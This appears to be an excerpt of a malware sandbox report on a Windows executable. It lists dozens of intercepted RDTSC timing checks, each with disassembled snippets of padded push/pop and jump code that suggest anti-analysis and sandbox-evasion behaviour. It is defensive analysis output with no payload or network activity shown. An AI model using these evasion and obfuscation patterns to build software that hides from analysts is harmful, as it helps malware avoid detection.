Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5594E4 second address: 559500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED46h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 559500 second address: 559504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 55962B second address: 559631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 559631 second address: 559644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0FE14B0506h 0x0000000d jnc 00007F0FE14B0506h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A8F5C second address: 4A8F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 4A8F62 second address: 4A8F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 562AAF second address: 562AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED45h 0x00000009 pop esi 0x0000000a js 00007F0FE0B8ED3Ch 0x00000010 jne 00007F0FE0B8ED36h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5619F7 second address: 5619FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5619FD second address: 561A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5606D5 second address: 5606DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5606DC second address: 5606E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0FE0B8ED36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5606E7 second address: 5606ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5680E5 second address: 5680EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5680EB second address: 56810F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0511h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F0FE14B0506h 0x00000012 jp 00007F0FE14B0506h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 56810F second address: 568152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0FE0B8ED46h 0x00000010 jmp 00007F0FE0B8ED45h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 568152 second address: 568156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 568294 second address: 568298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 568298 second address: 5682A4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0FE14B0506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 568405 second address: 56840B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 56840B second address: 56840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 56840F second address: 568422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 577D38 second address: 577D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5815D7 second address: 5815F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007F0FE0B8ED3Eh 0x0000000d jbe 00007F0FE0B8ED3Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590015 second address: 59001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590314 second address: 590336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0FE0B8ED4Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590336 second address: 590355 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE14B0517h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590355 second address: 590359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590359 second address: 59036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0FE14B0506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59036F second address: 590373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590373 second address: 590379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590379 second address: 59038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F0FE0B8ED3Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59038B second address: 5903A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B0517h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590671 second address: 590688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0FE0B8ED3Ah 0x0000000b js 00007F0FE0B8ED3Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590688 second address: 5906B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0FE14B0519h 0x0000000e jnl 00007F0FE14B050Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59083E second address: 590842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590974 second address: 59097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59097A second address: 590986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 590986 second address: 590991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0FE14B0506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5913C9 second address: 5913CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5913CD second address: 5913D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5913D1 second address: 5913E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F0FE0B8ED38h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5913E5 second address: 5913EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5947DE second address: 5947E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5947E4 second address: 5947EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5947EF second address: 5947F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 597354 second address: 597361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0FE14B0506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 597361 second address: 59737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F0FE0B8ED36h 0x00000013 jl 00007F0FE0B8ED36h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59708F second address: 597093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 597093 second address: 59709F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59709F second address: 5970A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 599710 second address: 59972C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED3Dh 0x00000009 jmp 00007F0FE0B8ED3Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 59972C second address: 599730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5A76EA second address: 5A76FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Fh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5A8EE2 second address: 5A8EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5A8EE6 second address: 5A8EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5B5EBF second address: 5B5ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CAFEC second address: 5CAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CAFF2 second address: 5CB025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F0FE14B050Fh 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F0FE14B0513h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CB198 second address: 5CB1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE0B8ED3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CB1A7 second address: 5CB1AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CB8F3 second address: 5CB915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED46h 0x00000007 jl 00007F0FE0B8ED3Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5CD510 second address: 5CD51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0FE14B0506h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5D17BA second address: 5D17E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jnl 00007F0FE0B8ED40h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jo 00007F0FE0B8ED36h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5D17E1 second address: 5D1822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0FE14B0519h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F0FE14B0510h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007F0FE14B0506h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5D1822 second address: 5D183B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5D2F45 second address: 5D2F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0FE14B0515h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5D4F85 second address: 5D4FC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F0FE0B8ED42h 0x00000015 jmp 00007F0FE0B8ED42h 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5380383 second address: 5380387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 5380387 second address: 53803C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED3Ch 0x0000000c or cx, 2518h 0x00000011 jmp 00007F0FE0B8ED3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0FE0B8ED44h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53803C3 second address: 5380457 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0FE14B0514h 0x00000011 and cx, A9D8h 0x00000016 jmp 00007F0FE14B050Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F0FE14B0518h 0x00000022 xor ecx, 7CABF438h 0x00000028 jmp 00007F0FE14B050Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007F0FE14B0516h 0x00000036 mov edx, dword ptr [ebp+0Ch] 0x00000039 pushad 0x0000003a call 00007F0FE14B050Eh 0x0000003f mov bx, si 0x00000042 pop eax 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A05F5 second address: 53A0628 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0FE0B8ED3Eh 0x0000000f push eax 0x00000010 jmp 00007F0FE0B8ED3Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0628 second address: 53A062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A062C second address: 53A0647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0647 second address: 53A0685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0FE14B050Fh 0x00000009 xor esi, 103A424Eh 0x0000000f jmp 00007F0FE14B0519h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0685 second address: 53A0689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0689 second address: 53A068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A068D second address: 53A0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0693 second address: 53A0699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0699 second address: 53A06EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ax, 8E41h 0x00000012 mov esi, 3B9ECD7Dh 0x00000017 popad 0x00000018 pushfd 0x00000019 jmp 00007F0FE0B8ED3Ah 0x0000001e sbb si, 7458h 0x00000023 jmp 00007F0FE0B8ED3Bh 0x00000028 popfd 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F0FE0B8ED3Bh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A06EC second address: 53A06F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A06F0 second address: 53A06F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A06F6 second address: 53A0736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0FE14B0515h 0x00000013 or ecx, 6CF5F156h 0x00000019 jmp 00007F0FE14B0511h 0x0000001e popfd 0x0000001f mov si, 32C7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0736 second address: 53A073C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A073C second address: 53A0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0740 second address: 53A0744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0744 second address: 53A0781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a mov ax, CA8Dh 0x0000000e call 00007F0FE14B050Ah 0x00000013 jmp 00007F0FE14B0512h 0x00000018 pop eax 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0FE14B050Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A0781 second address: 53A07B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushfd 0x00000007 jmp 00007F0FE0B8ED3Ah 0x0000000c or cx, 0838h 0x00000011 jmp 00007F0FE0B8ED3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebp-04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 6265D826h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	RDTSC instruction interceptor: First address: 53A07B4 second address: 53A07DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0FE14B0517h 0x00000011 rdtsc
